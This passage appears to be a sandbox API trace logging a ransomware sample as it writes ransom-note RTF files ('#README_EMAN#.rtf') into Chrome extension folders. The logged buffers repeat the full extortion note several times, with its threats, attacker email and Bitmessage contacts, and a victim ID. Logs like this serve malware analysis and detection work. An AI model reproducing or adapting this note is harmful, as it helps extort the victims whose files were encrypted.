br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.267] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.268] CloseHandle (hObject=0x2c8) returned 1 [0280.268] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0280.268] GetLastError () returned 0x2 [0280.268] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. 